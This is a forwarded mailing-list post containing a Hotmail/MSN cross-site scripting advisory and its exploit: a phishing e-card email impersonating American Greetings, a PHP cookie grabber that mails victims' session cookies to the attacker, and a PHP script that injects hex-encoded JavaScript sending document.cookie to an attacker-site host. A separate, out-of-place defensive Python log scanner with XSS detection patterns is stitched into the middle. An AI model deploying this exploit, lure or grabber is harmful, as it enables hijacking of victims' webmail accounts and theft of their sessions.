Hi All,
    Following XSS code from a mailing list. Any c0der can test this
vulnerability and exploit code.

-R


Hotmail/MSN Cookie Theft Advisory/Xploit
/* Hotmail/MSN Cross Site Scripting Exploit

Author: Simo Ben youssef aka _6mO_HaCk
Contact: Simo_at_morx_dot_org
Discovered: September 15 2005
Published: February 20 2006
Vendor: MSN.com
Service: Hotmail.com Webmail Service
Vulnerability: Cross Site Scripting (Cookie-Theft)
Severity: Medium/High
Tested on: IE 6.0 (designed for), Firefox 1.5 and Opera (should work on all browsers)
Original Advisory/Xploit: http://www.morx.org/HotmailCookieXploit.txt
Morx Security Research Team
http://www.morx.org

Description:

Exploit written in PHP to exploit the $a variable cross site scripting
vulnerability inside the Hotmail/MSN inbox. The exploit requires the victim to
open the email sent by the attacker and click on a URL, therefore some
Social Engineering skills are required too.

Notice: if you don't know what cross site scripting is and/or how it is
being exploited, then just stop reading here, as you will have to
modify some things on the exploit to make it work for you; but if you
insist, then good luck.

Exploitation:

Exploiting this flaw seemed to be almost impossible on Internet
Explorer browsers, because the vulnerable variable resides inside the
Hotmail inbox and its value has to be correct; we can't avoid it,
replace it or guess it in any way. At this point it was OK, since it was
possible to get the victim to click on the URL, grab the entire HTTP
referrer, add our malicious code at the end of the variable value and
redirect the victim back to the HTTP referrer with one single script.
This worked just fine on Firefox, while it didn't work on IE because
Hotmail filters <a href="" and replaces it with javascript:ol();, so
the link opens a new Internet Explorer window, and of course when IE
opens another window it doesn't send the HTTP referrer of the page the
link was opened from. So one way to exploit this was to insert
an <img src="" and make it point to a PHP script in order to grab the
HTTP referrer of the victim, reconstruct it, add JavaScript code at
the end of the $a variable value, and then open another PHP script on
the same server and write into it some PHP code to make an automatic
redirection to the reconstructed HTTP referrer when the victim
clicks on the second link, and therefore get the malicious code
executed, which will grab the user authentication cookie and send it
to the attacker script, giving the attacker full access to the victim's
inbox for 24 hours, which is the default time set in Hotmail for cookie
expiration :)

Exploiting this vulnerability can be done by uploading the following
script to a PHP-enabled webserver, then sending an email to the victim
with <img src="http://www.attacker-server.com/a.php">, where a.php is
the PHP exploit file name, and
<a href="http://www.attacker-server.com/ecard.php">, which is the link of
the second script (the one that gets created by a.php). As I said, some
Social Engineering skills are required, so as an example the email can
be sent as a greeting card with the following HTML code; you may also
need to modify some things on the PHP exploit to make it fit your needs.
<p>Hello,</p>
<p>Jennifer has just sent you a greeting card.</p>
<p>To view your greeting card, click on the link below:</p>
<p><a href="http://attacker-site/ecard.php">http://lycos.americangreetings.com/view.pd?i=197489639&amp;m=8381&amp;rr=y&amp;source=lycos</a></p>
<p>Or copy and paste the above link into your web browser's address
window</p>
<p>Or enter this eCard number 9584B7E784 on our eCard Pick Up page at
www.americangreetings.com</p>
<p>Thanks for using Lycos Greetings with AmericanGreetings.com</p>
<img src="http://attacker-site/a.php">

As a cookie grabber you may use the following code:

$cookie = $_GET['cookie'];
$ip = getenv("REMOTE_ADDR");
$msg = "Cookie: $cookie\nIP Address: $ip";
$subject = "cookie";
mail("youremail.org", $subject, $msg);

header("location: http://www.americangreetings.com/view.pd?i=405014155&m=6355&source=ag999");

At the end I would like to say a big thanks to mat
(mattzew5_at_hotmail_dot_com) for helping me research and test this
exploit. It took several days of research to exploit this flaw, so once
again thanks mat.

Greets to all MorX members and especially to BlooDMASK, even though he
refused to let me test this on his Hotmail account; certainly that's
because he has some nice xxx passwords on it :) Also greets to barbenoir
(boule7ia), th3-brain, Dragos and everybody else.

Why am I publishing this late?

Because I found better flaws in Hotmail which I won't be releasing anytime
soon :)

Workaround:

Avoid clicking on links while being authenticated.
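As an added example (not part of the advisory and not its author's code), here is the defender-side counterpart to the technique described in the Exploitation section: a small Python scanner that percent-decodes query parameters from web server access-log lines (including double-encoded values, which a single decode would miss), flags the indicators the payload above relies on (an attribute break-out such as "><, a script tag, a read of document.cookie and a write to document.location), and shows the server-side fix that the workaround alone cannot give you: HTML-encoding the reflected value before it is echoed into the page. The combined-log format and the parameter name a follow the post; the IP addresses, the collector hostname and the log lines themselves are constructed for the example.

```python
"""Detect reflected-XSS cookie-theft attempts in web server access logs.

Added example; not part of the original advisory. The parameter name "a"
and the Hotmail-style path are taken from the post; hosts and IPs are
constructed.
"""
import html
import re
from urllib.parse import parse_qsl, quote, unquote, urlsplit

# Detection patterns, applied to the fully decoded parameter value.
INDICATORS = {
    "attr_breakout":  re.compile(r'["\']\s*>\s*<'),                      # closes an attribute, opens a tag
    "script_tag":     re.compile(r"<\s*script\b", re.I),
    "event_handler":  re.compile(r"\bon[a-z]+\s*=", re.I),              # onerror=, onload=, ...
    "cookie_read":    re.compile(r"document\s*\.\s*cookie", re.I),
    "location_write": re.compile(r"(?:document|window)\s*\.\s*location\s*=", re.I),
}

# client_ip ident user [timestamp] "METHOD target ..."
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')


def decode_fully(value, max_rounds=4):
    """Percent-decode until the value stops changing, so a double-encoded
    payload (%2522 -> %22 -> ") is inspected in its final form."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(value):
    """Return the names of all indicators that fire on a decoded value."""
    return [name for name, rx in INDICATORS.items() if rx.search(value)]


def scan_line(line):
    """Parse one combined-log line and return (ip, param, indicators) for
    each suspicious query parameter; [] when nothing fires."""
    m = REQUEST_RE.match(line)
    if not m:
        return []
    ip, _method, target = m.groups()
    findings = []
    # parse_qsl performs the first decode; decode_fully strips further layers.
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        hits = classify(decode_fully(raw))
        if hits:
            findings.append((ip, name, hits))
    return findings


def scan_log(text):
    """Scan a whole log and collect findings from every line."""
    findings = []
    for line in text.splitlines():
        findings.extend(scan_line(line))
    return findings


def safe_reflect(value):
    """The server-side fix: HTML-encode the parameter before echoing it into
    the page, so a closing quote or angle bracket cannot break out of the
    attribute it lands in."""
    return html.escape(value, quote=True)


# Constructed sample data. PAYLOAD is the kind of value the advisory describes
# (break out of the attribute, redirect to a collector with document.cookie).
PAYLOAD = '"><script>document.location="http://collector.invalid/c?c="+document.cookie</script>'
LOG_TEMPLATE = ('10.0.0.%d - - [20/Feb/2006:10:01:0%d +0000] '
                '"GET /cgi-bin/HoTMaiL?a=%s&curmbox=F000000001 HTTP/1.1" 200 5120')
SAMPLE_LOG = "\n".join([
    LOG_TEMPLATE % (5, 2, "abc123"),                                   # benign
    LOG_TEMPLATE % (9, 7, "abc123" + quote(PAYLOAD, safe="")),         # payload, encoded once
    LOG_TEMPLATE % (7, 8, quote("<b>hello</b>", safe="")),             # harmless markup, no alert
    LOG_TEMPLATE % (4, 9, quote(quote(PAYLOAD, safe=""), safe="")),    # payload, encoded twice
])

if __name__ == "__main__":
    for ip, param, hits in scan_log(SAMPLE_LOG):
        print(f"{ip}: parameter {param!r} -> {', '.join(hits)}")
    print("reflected safely as:", safe_reflect(PAYLOAD))
```

Two of the four constructed lines are reported, both on parameter a, with the same four indicators; the line carrying only <b>hello</b> is deliberately not flagged, because the patterns look for the break-out and the script, not for any angle bracket. Note that the escaped output of safe_reflect still contains the words document.cookie, which is why detection works on decoded request values and the fix works on output encoding, not on blocking keywords.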

Disclaimer:

This entire document is for educational, testing and demonstration purposes
only. Modification, use and/or publishing of this information is entirely at
your OWN risk. The information provided in this advisory is to be
used/tested on your OWN machine/account. I cannot be held responsible for
any of the above.

------------------------ Hotmail/MSN accounts XSS Xploit by Simo Ben
youssef ---------------------- */

<?php

/* file name of the script that the victim will visit
make sure your webserver has writing permissions
otherwise create ecard.php manually and chmod it to 777 or whatever */

$file = "ecard.php";

// get the http referrer that we get with <img

$HTTP_REFERER = getenv("HTTP_REFERER");

$host = $HTTP_REFERER;

// reconstruct the http referrer

// get the &curmbox string position

$first = strpos($host, '&curmbox');

// get the first url part based on $curmbox position

$firstpart = substr($host, 0, $first);

// get the second url part

$secondpart = substr($host, $first);

/* split the second part and list the first
two variables since hotmail duplicates those sometimes */

list($a, $b, $c) = split('[&]', $secondpart);

// put all the above together

$target = "$firstpart&$a$b&$c";

$fo = fopen($file, 'w+');

// change this to your cookie grabber address, don't include "http://" as
// it's already included in hex
// the variable name for the cookie grabber should be included too

$d = 'www.attacker-site.com/cookie-grabber.php?cookie';

// first JavaScript hex code

$e =
'%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F';

// second JavaScript hex code

$f =
'%3D%27%2B%65%73%63%61%70%65%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%2E%73%75%62%73%74%72%28%30%2C%31%39%30%30%29%3C%2F%73%63%72%69%70%74%3E';

// convert the cookie grabber url to hex code and add "%" in front of
// each hex character

$converted = bin2hex($d);

$converted = chunk_split($converted, 2, '%');

$converted = '%' . substr($converted, 0, strlen($converted) - 1);

$data = '' . $target . '' . $e . '' . $converted
. '' . $f .'"); ?>';

/* write the data that would redirect the victim to the reconstructed http
referrer and exploit the vulnerable variable and make the cookie
redirection */

fwrite($fo, $data);

fclose($fo);

?>
